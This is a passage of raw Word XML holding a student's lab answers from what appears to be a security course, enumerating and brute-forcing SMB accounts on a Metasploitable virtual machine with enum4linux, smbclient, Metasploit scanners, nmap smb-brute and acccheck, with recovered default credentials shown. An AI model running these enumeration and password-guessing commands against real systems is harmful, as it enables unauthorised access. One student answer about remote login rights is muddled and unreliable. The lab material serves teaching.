        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1042 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1044 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1046 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1047 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1048 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">S-1-5-21-1042354039-2475377354-766472396-1050 *unknown*\*unknown* (8)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Getting printer info for 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">No printers returned.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">enum4linux complete on Mon Feb 20 01:07:50 2017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b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3) SMBCLIENT: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﻿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b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# smbclient -L 10.0.2.4 -N</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">WARNING: The "syslog" option is deprecated</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Anonymous login successful</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Sharename       Type      Comment</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------       ----      -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">print$          Disk      Printer Drivers</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">tmp             Disk      oh noes!</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">opt             Disk      </w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Anonymous login successful</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Server               Comment</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------            -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Workgroup            Master</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------            -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">WORKGROUP            METASPLOITABLE</w:t>
        <w:br w:type="textWrapping"/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b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4) MSFCONSOLE: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cc0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># msfconsole -q</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; use auxiliary/scanner/smb/smb_enumshares </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smb_enumshares</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; set rhosts 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">rhosts =&gt; 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smb_enumshares</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; run</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[+]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.4:139          - print$ - (DISK) Printer Drivers</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[+]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.4:139          - tmp - (DISK) oh noes!</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[+]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.4:139          - opt - (DISK) </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[+]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.4:139          - IPC$ - (IPC) IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4e9a06"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[+]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.4:139          - ADMIN$ - (IPC) IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanned 1 of 1 hosts (100% complete)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auxiliary module execution completed</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smb_enumshares</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt;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b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2) Look up the Unix commands grep and cut.  Build a user list using the smb user enumeration and these tools.  We want just the userid's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b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# enum4linux  10.0.2.4 &gt;&gt; Desktop/e.txt</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# grep users Desktop/e.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# grep user Desktop/e.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Server 10.0.2.4 allows sessions using username '', password ''</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x6 RID: 0xbba acb: 0x00000010 Account: user</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: just a user,111,,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[games] rid:[0x3f2]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[nobody] rid:[0x1f5]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[bind] rid:[0x4ba]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[proxy] rid:[0x402]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[syslog] rid:[0x4b4]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[user] rid:[0xbba]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[www-data] rid:[0x42a]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[root] rid:[0x3e8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[news] rid:[0x3fa]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[postgres] rid:[0x4c0]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[bin] rid:[0x3ec]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[mail] rid:[0x3f8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[distccd] rid:[0x4c6]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[proftpd] rid:[0x4ca]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[dhcp] rid:[0x4b2]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[daemon] rid:[0x3ea]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[sshd] rid:[0x4b8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[man] rid:[0x3f4]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[lp] rid:[0x3f6]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[mysql] rid:[0x4c2]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[gnats] rid:[0x43a]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[libuuid] rid:[0x4b0]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[backup] rid:[0x42c]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[msfadmin] rid:[0xbb8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[telnetd] rid:[0x4c8]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[sys] rid:[0x3ee]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[klog] rid:[0x4b6]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[postfix] rid:[0x4bc]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[service] rid:[0xbbc]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[list] rid:[0x434]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[irc] rid:[0x436]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[ftp] rid:[0x4be]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[tomcat55] rid:[0x4c4]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[sync] rid:[0x3f0]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">user:[uucp] rid:[0x3fc]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''</w:t>
        <w:br w:type="textWrapping"/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﻿</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smb_version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) &gt; use auxiliary/scanner/smb/smb_enumusers</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smb_enumusers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) &gt; set rhosts 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">rhosts =&gt; 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msf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auxiliary(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smb_enumusers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) &gt; run</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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10.0.2.4:139          - METASPLOITABLE [ games, nobody, bind, proxy, syslog, user, www-data, root, news, postgres, bin, mail, distccd, proftpd, dhcp, daemon, sshd, man, lp, mysql, gnats, libuuid, backup, msfadmin, telnetd, sys, klog, postfix, service, list, irc, ftp, tomcat55, sync, uucp ] ( LockoutTries=0 PasswordMin=5 )</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Scanned 1 of 1 hosts (100% complete)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*]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Auxiliary module execution completed</w:t>
        <w:br w:type="textWrapping"/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3) What userids in this list might we want to try to brute force? Are there some users that typically can't log in remotely?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user:[user] rid:[0xbba], user:[root] rid:[0x3e8], user:[msfadmin] rid:[0xbb8], user:[daemon] rid:[0x3ea], user:[nobody] rid:[0x1f5], and I would include Administrator. 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Typically users without domain admin rights can only login remotely. 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b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# nmap --script smb-brute.nse -p 445 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-20 03:31 MST</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap scan report for 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host is up (0.00057s latency).</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PORT    STATE SERVICE</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">445/tcp open  microsoft-ds</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">MAC Address: 08:00:27:3E:5B:40 (Oracle VirtualBox virtual NIC)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host script results:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">| smb-brute: </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|   msfadmin:msfadmin =&gt; Valid credentials</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|_  user:user =&gt; Valid credentials</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap done: 1 IP address (1 host up) scanned in 169.61 seconds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b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4) There are multiple brute forcing tools on Kali, see if you can find 3 of them and list them here.  Why might there be different tools that do the same thing?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Acccheck:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="cc0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~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# acccheck -v -t 10.0.2.4 -u user -P /usr/share/dirb/wordlists/common.txt </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[…]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="180" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/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      SUCCESS.... connected to 10.0.2.4 with username:'user' and password:'user'</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">End of Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:after="180" w:before="18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Rule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Medusa: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Rule="auto"/>
